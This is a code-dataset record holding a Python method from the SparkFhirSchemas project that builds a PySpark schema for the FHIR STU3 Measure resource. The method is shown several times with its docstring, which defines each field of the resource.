succint statement of the need for the measure. Usually includes\n statements pertaining to importance criterion: impact, gap in care, and\n evidence.\n\n clinicalRecommendationStatement: Provides a summary of relevant clinical guidelines or other clinical\n recommendations supporting the measure.\n\n improvementNotation: Information on whether an increase or decrease in score is the preferred\n result (e.g., a higher score indicates better quality OR a lower score\n indicates better quality OR quality is whthin a range).\n\n definition: Provides a description of an individual term used within the measure.\n\n guidance: Additional guidance for the measure including how it can be used in a clinical\n context, and the intent of the measure.\n\n set: The measure set, e.g. Preventive Care and Screening.\n\n group: A group of population criteria for the measure.\n\n supplementalData: The supplemental data criteria for the measure report, specified as either the\n name of a valid CQL expression within a referenced library, or a valid FHIR\n Resource Path.\n\n ' from spark_fhir_schemas.stu3.complex_types.extension import ExtensionSchema from spark_fhir_schemas.stu3.complex_types.meta import MetaSchema from spark_fhir_schemas.stu3.complex_types.narrative import NarrativeSchema from spark_fhir_schemas.stu3.simple_types.resourcelist import ResourceListSchema from spark_fhir_schemas.stu3.complex_types.identifier import IdentifierSchema from spark_fhir_schemas.stu3.complex_types.period import PeriodSchema from spark_fhir_schemas.stu3.complex_types.usagecontext import UsageContextSchema from spark_fhir_schemas.stu3.complex_types.codeableconcept import CodeableConceptSchema from spark_fhir_schemas.stu3.complex_types.contributor import ContributorSchema from spark_fhir_schemas.stu3.complex_types.contactdetail import ContactDetailSchema from spark_fhir_schemas.stu3.complex_types.relatedartifact import RelatedArtifactSchema from spark_fhir_schemas.stu3.complex_types.reference import ReferenceSchema from spark_fhir_schemas.stu3.complex_types.measure_group import Measure_GroupSchema from spark_fhir_schemas.stu3.complex_types.measure_supplementaldata import Measure_SupplementalDataSchema if ((max_recursion_limit and (nesting_list.count('Measure') >= max_recursion_limit)) or (max_nesting_depth and (nesting_depth >= max_nesting_depth))): return StructType([StructField('id', StringType(), True)]) my_nesting_list: List[str] = (nesting_list + ['Measure']) schema = StructType([StructField('id', StringType(), True), StructField('extension', ArrayType(ExtensionSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('meta', MetaSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('implicitRules', StringType(), True), StructField('language', StringType(), True), StructField('text', NarrativeSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('contained', ArrayType(ResourceListSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('resourceType', StringType(), True), StructField('url', StringType(), True), StructField('identifier', ArrayType(IdentifierSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('version', StringType(), True), StructField('name', StringType(), True), StructField('title', StringType(), True), StructField('status', StringType(), True), StructField('experimental', BooleanType(), True), StructField('date', StringType(), True), StructField('publisher', StringType(), True), StructField('description', StringType(), True), StructField('purpose', StringType(), True), StructField('usage', StringType(), True), StructField('approvalDate', DateType(), True), StructField('lastReviewDate', DateType(), True), StructField('effectivePeriod', PeriodSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('useContext', ArrayType(UsageContextSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('jurisdiction', ArrayType(CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('topic', ArrayType(CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('contributor', ArrayType(ContributorSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('contact', ArrayType(ContactDetailSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('copyright', StringType(), True), StructField('relatedArtifact', ArrayType(RelatedArtifactSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('library', ArrayType(ReferenceSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('disclaimer', StringType(), True), StructField('scoring', CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('compositeScoring', CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('type', ArrayType(CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('riskAdjustment', StringType(), True), StructField('rateAggregation', StringType(), True), StructField('rationale', StringType(), True), StructField('clinicalRecommendationStatement', StringType(), True), StructField('improvementNotation', StringType(), True), StructField('definition', ArrayType(StringType()), True), StructField('guidance', StringType(), True), StructField('set', StringType(), True), StructField('group', ArrayType(Measure_GroupSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('supplementalData', ArrayType(Measure_SupplementalDataSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True)]) if (not include_extension): schema.fields = [(c if (c.name != 'extension') else StructField('extension', StringType(), True)) for c in schema.fields] return schema
The Measure resource provides the definition of a quality measure. id: The logical id of the resource, as used in the URL for the resource. Once assigned, this value never changes. extension: May be used to represent additional information that is not part of the basic definition of the resource. In order to make the use of extensions safe and manageable, there is a strict set of governance applied to the definition and use of extensions. Though any implementer is allowed to define an extension, there is a set of requirements that SHALL be met as part of the definition of the extension. meta: The metadata about the resource. This is content that is maintained by the infrastructure. Changes to the content may not always be associated with version changes to the resource. implicitRules: A reference to a set of rules that were followed when the resource was constructed, and which must be understood when processing the content. language: The base language in which the resource is written. text: A human-readable narrative that contains a summary of the resource, and may be used to represent the content of the resource to a human. The narrative need not encode all the structured data, but is required to contain sufficient detail to make it "clinically safe" for a human to just read the narrative. Resource definitions may define what content should be represented in the narrative to ensure clinical safety. contained: These resources do not have an independent existence apart from the resource that contains them - they cannot be identified independently, and nor can they have their own independent transaction scope. resourceType: This is a Measure resource url: An absolute URI that is used to identify this measure when it is referenced in a specification, model, design or an instance. This SHALL be a URL, SHOULD be globally unique, and SHOULD be an address at which this measure is (or will be) published. The URL SHOULD include the major version of the measure. For more information see [Technical and Business Versions](resource.html#versions). identifier: A formal identifier that is used to identify this measure when it is represented in other formats, or referenced in a specification, model, design or an instance. version: The identifier that is used to identify this version of the measure when it is referenced in a specification, model, design or instance. This is an arbitrary value managed by the measure author and is not expected to be globally unique. For example, it might be a timestamp (e.g. yyyymmdd) if a managed version is not available. There is also no expectation that versions can be placed in a lexicographical sequence. To provide a version consistent with the Decision Support Service specification, use the format Major.Minor.Revision (e.g. 1.0.0). For more information on versioning knowledge assets, refer to the Decision Support Service specification. Note that a version is required for non-experimental active artifacts. name: A natural language name identifying the measure. This name should be usable as an identifier for the module by machine processing applications such as code generation. title: A short, descriptive, user-friendly title for the measure. status: The status of this measure. Enables tracking the life-cycle of the content. experimental: A boolean value to indicate that this measure is authored for testing purposes (or education/evaluation/marketing), and is not intended to be used for genuine usage. date: The date (and optionally time) when the measure was published. The date must change if and when the business version changes and it must change if the status code changes. In addition, it should change when the substantive content of the measure changes. publisher: The name of the individual or organization that published the measure. description: A free text natural language description of the measure from a consumer's perspective. purpose: Explaination of why this measure is needed and why it has been designed as it has. usage: A detailed description of how the measure is used from a clinical perspective. approvalDate: The date on which the resource content was approved by the publisher. Approval happens once when the content is officially approved for usage. lastReviewDate: The date on which the resource content was last reviewed. Review happens periodically after approval, but doesn't change the original approval date. effectivePeriod: The period during which the measure content was or is planned to be in active use. useContext: The content was developed with a focus and intent of supporting the contexts that are listed. These terms may be used to assist with indexing and searching for appropriate measure instances. jurisdiction: A legal or geographic region in which the measure is intended to be used. topic: Descriptive topics related to the content of the measure. Topics provide a high-level categorization of the type of the measure that can be useful for filtering and searching. contributor: A contributor to the content of the measure, including authors, editors, reviewers, and endorsers. contact: Contact details to assist a user in finding and communicating with the publisher. copyright: A copyright statement relating to the measure and/or its contents. Copyright statements are generally legal restrictions on the use and publishing of the measure. relatedArtifact: Related artifacts such as additional documentation, justification, or bibliographic references. library: A reference to a Library resource containing the formal logic used by the measure. disclaimer: Notices and disclaimers regarding the use of the measure, or related to intellectual property (such as code systems) referenced by the measure. scoring: Indicates how the calculation is performed for the measure, including proportion, ratio, continuous variable, and cohort. The value set is extensible, allowing additional measure scoring types to be represented. compositeScoring: If this is a composite measure, the scoring method used to combine the component measures to determine the composite score. type: Indicates whether the measure is used to examine a process, an outcome over time, a patient-reported outcome, or a structure measure such as utilization. riskAdjustment: A description of the risk adjustment factors that may impact the resulting score for the measure and how they may be accounted for when computing and reporting measure results. rateAggregation: Describes how to combine the information calculated, based on logic in each of several populations, into one summarized result. rationale: Provides a succint statement of the need for the measure. Usually includes statements pertaining to importance criterion: impact, gap in care, and evidence. clinicalRecommendationStatement: Provides a summary of relevant clinical guidelines or other clinical recommendations supporting the measure. improvementNotation: Information on whether an increase or decrease in score is the preferred result (e.g., a higher score indicates better quality OR a lower score indicates better quality OR quality is whthin a range). definition: Provides a description of an individual term used within the measure. guidance: Additional guidance for the measure including how it can be used in a clinical context, and the intent of the measure. set: The measure set, e.g. Preventive Care and Screening. group: A group of population criteria for the measure. supplementalData: The supplemental data criteria for the measure report, specified as either the name of a valid CQL expression within a referenced library, or a valid FHIR Resource Path.
spark_fhir_schemas/stu3/complex_types/measure.py
get_schema
icanbwell/SparkFhirSchemas
2
python
@staticmethod def get_schema(max_nesting_depth: Optional[int]=6, nesting_depth: int=0, nesting_list: List[str]=[], max_recursion_limit: Optional[int]=2, include_extension: Optional[bool]=False, extension_fields: Optional[List[str]]=['valueBoolean', 'valueCode', 'valueDate', 'valueDateTime', 'valueDecimal', 'valueId', 'valueInteger', 'valuePositiveInt', 'valueString', 'valueTime', 'valueUnsignedInt', 'valueUri', 'valueQuantity'], extension_depth: int=0, max_extension_depth: Optional[int]=2) -> Union[(StructType, DataType)]: '\n The Measure resource provides the definition of a quality measure.\n\n\n id: The logical id of the resource, as used in the URL for the resource. Once\n assigned, this value never changes.\n\n extension: May be used to represent additional information that is not part of the basic\n definition of the resource. In order to make the use of extensions safe and\n manageable, there is a strict set of governance applied to the definition and\n use of extensions. Though any implementer is allowed to define an extension,\n there is a set of requirements that SHALL be met as part of the definition of\n the extension.\n\n meta: The metadata about the resource. This is content that is maintained by the\n infrastructure. Changes to the content may not always be associated with\n version changes to the resource.\n\n implicitRules: A reference to a set of rules that were followed when the resource was\n constructed, and which must be understood when processing the content.\n\n language: The base language in which the resource is written.\n\n text: A human-readable narrative that contains a summary of the resource, and may be\n used to represent the content of the resource to a human. The narrative need\n not encode all the structured data, but is required to contain sufficient\n detail to make it "clinically safe" for a human to just read the narrative.\n Resource definitions may define what content should be represented in the\n narrative to ensure clinical safety.\n\n contained: These resources do not have an independent existence apart from the resource\n that contains them - they cannot be identified independently, and nor can they\n have their own independent transaction scope.\n\n resourceType: This is a Measure resource\n\n url: An absolute URI that is used to identify this measure when it is referenced in\n a specification, model, design or an instance. This SHALL be a URL, SHOULD be\n globally unique, and SHOULD be an address at which this measure is (or will\n be) published. The URL SHOULD include the major version of the measure. For\n more information see [Technical and Business\n Versions](resource.html#versions).\n\n identifier: A formal identifier that is used to identify this measure when it is\n represented in other formats, or referenced in a specification, model, design\n or an instance.\n\n version: The identifier that is used to identify this version of the measure when it is\n referenced in a specification, model, design or instance. This is an arbitrary\n value managed by the measure author and is not expected to be globally unique.\n For example, it might be a timestamp (e.g. yyyymmdd) if a managed version is\n not available. There is also no expectation that versions can be placed in a\n lexicographical sequence. To provide a version consistent with the Decision\n Support Service specification, use the format Major.Minor.Revision (e.g.\n 1.0.0). For more information on versioning knowledge assets, refer to the\n Decision Support Service specification. Note that a version is required for\n non-experimental active artifacts.\n\n name: A natural language name identifying the measure. This name should be usable as\n an identifier for the module by machine processing applications such as code\n generation.\n\n title: A short, descriptive, user-friendly title for the measure.\n\n status: The status of this measure. Enables tracking the life-cycle of the content.\n\n experimental: A boolean value to indicate that this measure is authored for testing purposes\n (or education/evaluation/marketing), and is not intended to be used for\n genuine usage.\n\n date: The date (and optionally time) when the measure was published. The date must\n change if and when the business version changes and it must change if the\n status code changes. In addition, it should change when the substantive\n content of the measure changes.\n\n publisher: The name of the individual or organization that published the measure.\n\n description: A free text natural language description of the measure from a consumer\'s\n perspective.\n\n purpose: Explaination of why this measure is needed and why it has been designed as it\n has.\n\n usage: A detailed description of how the measure is used from a clinical perspective.\n\n approvalDate: The date on which the resource content was approved by the publisher. Approval\n happens once when the content is officially approved for usage.\n\n lastReviewDate: The date on which the resource content was last reviewed. Review happens\n periodically after approval, but doesn\'t change the original approval date.\n\n effectivePeriod: The period during which the measure content was or is planned to be in active\n use.\n\n useContext: The content was developed with a focus and intent of supporting the contexts\n that are listed. These terms may be used to assist with indexing and searching\n for appropriate measure instances.\n\n jurisdiction: A legal or geographic region in which the measure is intended to be used.\n\n topic: Descriptive topics related to the content of the measure. Topics provide a\n high-level categorization of the type of the measure that can be useful for\n filtering and searching.\n\n contributor: A contributor to the content of the measure, including authors, editors,\n reviewers, and endorsers.\n\n contact: Contact details to assist a user in finding and communicating with the\n publisher.\n\n copyright: A copyright statement relating to the measure and/or its contents. Copyright\n statements are generally legal restrictions on the use and publishing of the\n measure.\n\n relatedArtifact: Related artifacts such as additional documentation, justification, or\n bibliographic references.\n\n library: A reference to a Library resource containing the formal logic used by the\n measure.\n\n disclaimer: Notices and disclaimers regarding the use of the measure, or related to\n intellectual property (such as code systems) referenced by the measure.\n\n scoring: Indicates how the calculation is performed for the measure, including\n proportion, ratio, continuous variable, and cohort. The value set is\n extensible, allowing additional measure scoring types to be represented.\n\n compositeScoring: If this is a composite measure, the scoring method used to combine the\n component measures to determine the composite score.\n\n type: Indicates whether the measure is used to examine a process, an outcome over\n time, a patient-reported outcome, or a structure measure such as utilization.\n\n riskAdjustment: A description of the risk adjustment factors that may impact the resulting\n score for the measure and how they may be accounted for when computing and\n reporting measure results.\n\n rateAggregation: Describes how to combine the information calculated, based on logic in each of\n several populations, into one summarized result.\n\n rationale: Provides a succint statement of the need for the measure. Usually includes\n statements pertaining to importance criterion: impact, gap in care, and\n evidence.\n\n clinicalRecommendationStatement: Provides a summary of relevant clinical guidelines or other clinical\n recommendations supporting the measure.\n\n improvementNotation: Information on whether an increase or decrease in score is the preferred\n result (e.g., a higher score indicates better quality OR a lower score\n indicates better quality OR quality is whthin a range).\n\n definition: Provides a description of an individual term used within the measure.\n\n guidance: Additional guidance for the measure including how it can be used in a clinical\n context, and the intent of the measure.\n\n set: The measure set, e.g. Preventive Care and Screening.\n\n group: A group of population criteria for the measure.\n\n supplementalData: The supplemental data criteria for the measure report, specified as either the\n name of a valid CQL expression within a referenced library, or a valid FHIR\n Resource Path.\n\n ' from spark_fhir_schemas.stu3.complex_types.extension import ExtensionSchema from spark_fhir_schemas.stu3.complex_types.meta import MetaSchema from spark_fhir_schemas.stu3.complex_types.narrative import NarrativeSchema from spark_fhir_schemas.stu3.simple_types.resourcelist import ResourceListSchema from spark_fhir_schemas.stu3.complex_types.identifier import IdentifierSchema from spark_fhir_schemas.stu3.complex_types.period import PeriodSchema from spark_fhir_schemas.stu3.complex_types.usagecontext import UsageContextSchema from spark_fhir_schemas.stu3.complex_types.codeableconcept import CodeableConceptSchema from spark_fhir_schemas.stu3.complex_types.contributor import ContributorSchema from spark_fhir_schemas.stu3.complex_types.contactdetail import ContactDetailSchema from spark_fhir_schemas.stu3.complex_types.relatedartifact import RelatedArtifactSchema from spark_fhir_schemas.stu3.complex_types.reference import ReferenceSchema from spark_fhir_schemas.stu3.complex_types.measure_group import Measure_GroupSchema from spark_fhir_schemas.stu3.complex_types.measure_supplementaldata import Measure_SupplementalDataSchema if ((max_recursion_limit and (nesting_list.count('Measure') >= max_recursion_limit)) or (max_nesting_depth and (nesting_depth >= max_nesting_depth))): return StructType([StructField('id', StringType(), True)]) my_nesting_list: List[str] = (nesting_list + ['Measure']) schema = StructType([StructField('id', StringType(), True), StructField('extension', ArrayType(ExtensionSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('meta', MetaSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('implicitRules', StringType(), True), StructField('language', StringType(), True), StructField('text', NarrativeSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('contained', ArrayType(ResourceListSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('resourceType', StringType(), True), StructField('url', StringType(), True), StructField('identifier', ArrayType(IdentifierSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('version', StringType(), True), StructField('name', StringType(), True), StructField('title', StringType(), True), StructField('status', StringType(), True), StructField('experimental', BooleanType(), True), StructField('date', StringType(), True), StructField('publisher', StringType(), True), StructField('description', StringType(), True), StructField('purpose', StringType(), True), StructField('usage', StringType(), True), StructField('approvalDate', DateType(), True), StructField('lastReviewDate', DateType(), True), StructField('effectivePeriod', PeriodSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('useContext', ArrayType(UsageContextSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('jurisdiction', ArrayType(CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('topic', ArrayType(CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('contributor', ArrayType(ContributorSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('contact', ArrayType(ContactDetailSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('copyright', StringType(), True), StructField('relatedArtifact', ArrayType(RelatedArtifactSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('library', ArrayType(ReferenceSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('disclaimer', StringType(), True), StructField('scoring', CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('compositeScoring', CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=(extension_depth + 1), max_extension_depth=max_extension_depth), True), StructField('type', ArrayType(CodeableConceptSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('riskAdjustment', StringType(), True), StructField('rateAggregation', StringType(), True), StructField('rationale', StringType(), True), StructField('clinicalRecommendationStatement', StringType(), True), StructField('improvementNotation', StringType(), True), StructField('definition', ArrayType(StringType()), True), StructField('guidance', StringType(), True), StructField('set', StringType(), True), StructField('group', ArrayType(Measure_GroupSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True), StructField('supplementalData', ArrayType(Measure_SupplementalDataSchema.get_schema(max_nesting_depth=max_nesting_depth, nesting_depth=(nesting_depth + 1), nesting_list=my_nesting_list, max_recursion_limit=max_recursion_limit, include_extension=include_extension, extension_fields=extension_fields, extension_depth=extension_depth, max_extension_depth=max_extension_depth)), True)]) if (not include_extension): schema.fields = [(c if (c.name != 'extension') else StructField('extension', StringType(), True)) for c in schema.fields] return schema
@staticmethod def get_schema(max_nesting_depth: Optional[int]=6, nesting_depth: int=0, nesting_list: List[str]=[], max_recursion_limit: Optional[int]=2, include_extension: Optional[bool]=False, extension_fields: Optional[List[str]]=['valueBoolean', 'valueCode', 'valueDate', 'valueDateTime', 'valueDecimal', 'valueId', 'valueInteger', 'valuePositiveInt', 'valueString', 'valueTime', 'valueUnsignedInt', 'valueUri', 'valueQuantity'], extension_depth: int=0, max_extension_depth: Optional[int]=2) -> Union[(StructType, DataType)]: '\n The Measure resource provides the definition of a quality measure.\n\n\n id: The logical id of the resource, as used in the URL for the resource. Once\n assigned, this value never changes.\n\n extension: May be used to represent additional information that is not part of the basic\n definition of the resource. In order to make the use of extensions safe and\n manageable, there is a strict set of governance applied to the definition and\n use of extensions. Though any implementer is allowed to define an extension,\n there is a set of requirements that SHALL be met as part of the definition of\n the extension.\n\n meta: The metadata about the resource. This is content that is maintained by the\n infrastructure. Changes to the content may not always be associated with\n version changes to the resource.\n\n implicitRules: A reference to a set of rules that were followed when the resource was\n constructed, and which must be understood when processing the content.\n\n language: The base language in which the resource is written.\n\n text: A human-readable narrative that contains a summary of the resource, and may be\n used to represent the content of the resource to a human. The narrative need\n not encode all the structured data, but is required to contain sufficient\n detail to make it "clinically safe" for a human to just read the narrative.\n Resource definitions may define what content should be represented in the\n narrative to ensure clinical safety.\n\n contained: These resources do not have an independent existence apart from the resource\n that contains them - they cannot be identified independently, and nor can they\n have their own independent transaction scope.\n\n resourceType: This is a Measure resource\n\n url: An absolute URI that is used to identify this measure when it is referenced in\n a specification, model, design or an instance. This SHALL be a URL, SHOULD be\n globally unique, and SHOULD be an address at which this measure is (or will\n be) published. The URL SHOULD include the major version of the measure. For\n more information see [Technical and Business\n Versions](resource.html#versions).\n\n identifier: A formal identifier that is used to identify this measure when it is\n represented in other formats, or referenced in a specification, model, design\n or an instance.\n\n version: The identifier that is used to identify this version of the measure when it is\n referenced in a specification, model, design or instance. This is an arbitrary\n value managed by the measure author and is not expected to be globally unique.\n For example, it might be a timestamp (e.g. yyyymmdd) if a managed version is\n not available. There is also no expectation that versions can be placed in a\n lexicographical sequence. To provide a version consistent with the Decision\n Support Service specification, use the format Major.Minor.Revision (e.g.\n 1.0.0). For more information on versioning knowledge assets, refer to the\n Decision Support Service specification. Note that a version is required for\n non-experimental active artifacts.\n\n name: A natural language name identifying the measure. This name should be usable as\n an identifier for the module by machine processing applications such as code\n generation.\n\n title: A short, descriptive, user-friendly title for the measure.\n\n status: The status of this measure. Enables tracking the life-cycle of the content.\n\n experimental: A boolean value to indicate that this measure is authored for testing purposes\n (or education/evaluation/marketing), and is not intended to be used for\n genuine usage.\n\n date: The date (and optionally time) when the measure was published. The date must\n change if and when the business version changes and it must change if the\n status code changes. In addition, it should change when the substantive\n content of the measure changes.\n\n publisher: The name of the individual or organization that published the measure.\n\n description: A free text natural language description of the measure from a consumer\'s\n perspective.\n\n purpose: Explaination of why this measure is needed and why it has been designed as it\n has.\n\n usage: A detailed description of how the measure is used from a clinical perspective.\n\n approvalDate: The date on which the resource content was approved by the publisher. Approval\n happens once when the content is officially approved for usage.\n\n lastReviewDate: The date on which the resource content was last reviewed. Review happens\n periodically after approval, but doesn\'t change the original approval date.\n\n effectivePeriod: The period during which the measure content was or is planned to be in active\n use.\n\n useContext: The content was developed with a focus and intent of supporting the contexts\n that are listed. These terms may be used to assist with indexing and searching\n for appropriate measure instances.\n\n jurisdiction: A legal or geographic region in which the measure is intended to be used.\n\n topic: Descriptive topics related to the content of the measure. Topics provide a\n high-level categorization of the type of the measure that can be useful for\n filtering and searching.\n\n contributor: A contributor to the content of the measure, including authors, editors,\n reviewers, and endorsers.\n\n contact: Contact details to assist a user in finding and communicating with the\n publisher.\n\n copyright: A copyright statement relating to the measure and/or its contents. Copyright\n statements are generally legal restrictions on the use and publishing of the\n measure.\n\n relatedArtifact: Related artifacts such as additional documentation, justification, or\n bibliographic references.\n\n library: A reference to a Library resource containing the formal logic used by the\n measure.\n\n disclaimer: Notices and disclaimers regarding the use of the measure, or related to\n intellectual property (such as code systems) referenced by the measure.\n\n scoring: Indicates how the calculation is performed for the measure, including\n proportion, ratio, continuous variable, and cohort. The value set is\n extensible, allowing additional measure scoring types to be represented.\n\n compositeScoring: If this is a composite measure, the scoring method used to combine the\n component measures to determine the composite score.\n\n type: Indicates whether the 